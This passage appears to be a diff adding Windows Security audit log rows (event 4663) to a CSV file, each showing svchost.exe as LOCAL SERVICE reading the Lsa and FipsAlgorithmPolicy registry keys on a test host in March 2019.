+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452830</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452829</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452828</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.295376Z"">
+    </TimeCreated>
+    <EventRecordID>452827</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.295376+04:00,1553038515.295376,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452826</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452825</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.215261Z"">
+    </TimeCreated>
+    <EventRecordID>452824</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.215261+04:00,1553038515.215261,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.205246Z"">
+    </TimeCreated>
+    <EventRecordID>452823</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.205246+04:00,1553038515.205246,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.185218Z"">
+    </TimeCreated>
+    <EventRecordID>452822</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.185218Z"">
+    </TimeCreated>
+    <EventRecordID>452821</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.185218+04:00,1553038515.185218,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.045016Z"">
+    </TimeCreated>
+    <EventRecordID>452820</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:15.045016Z"">
+    </TimeCreated>
+    <EventRecordID>452819</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:15.045016+04:00,1553038515.045016,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.904814Z"">
+    </TimeCreated>
+    <EventRecordID>452818</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.904814Z"">
+    </TimeCreated>
+    <EventRecordID>452817</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.904814+04:00,1553038514.904814,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.764613Z"">
+    </TimeCreated>
+    <EventRecordID>452816</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa</Data>
+    <Data Name=""HandleId"">0x468</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.764613Z"">
+    </TimeCreated>
+    <EventRecordID>452815</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""4"" ThreadID=""60"">
+    </Execution>
+    <Channel>Security</Channel>
+    <Computer>PC01.example.corp</Computer>
+    <Security>
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""SubjectUserSid"">S-1-5-19</Data>
+    <Data Name=""SubjectUserName"">LOCAL SERVICE</Data>
+    <Data Name=""SubjectDomainName"">NT AUTHORITY</Data>
+    <Data Name=""SubjectLogonId"">0x3e5</Data>
+    <Data Name=""ObjectServer"">Security</Data>
+    <Data Name=""ObjectType"">Key</Data>
+    <Data Name=""ObjectName"">\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\FipsAlgorithmPolicy</Data>
+    <Data Name=""HandleId"">0x520</Data>
+    <Data Name=""AccessList"">%%4432 
+				</Data>
+    <Data Name=""AccessMask"">0x1</Data>
+    <Data Name=""ProcessId"">0x5a8</Data>
+    <Data Name=""ProcessName"">C:\Windows\System32\svchost.exe</Data>
+  </EventData>
+</Event>"
+2019-03-20T03:35:14.764613+04:00,1553038514.764613,4663,LOCAL SERVICE,\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa,Key,C:\Windows\System32\svchost.exe,PC01.example.corp,Security,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Security-Auditing"" Guid=""54849625-5478-4994-A5BA-3E3B0328C30D"">
+    </Provider>
+    <EventID>4663</EventID>
+    <Version>0</Version>
+    <Level>0</Level>
+    <Task>12801</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8020000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-03-19T23:35:14.634426Z"">
+    </TimeCreated>
+    <EventRecordID>452814</EventRecordID>
+    <Correlation>
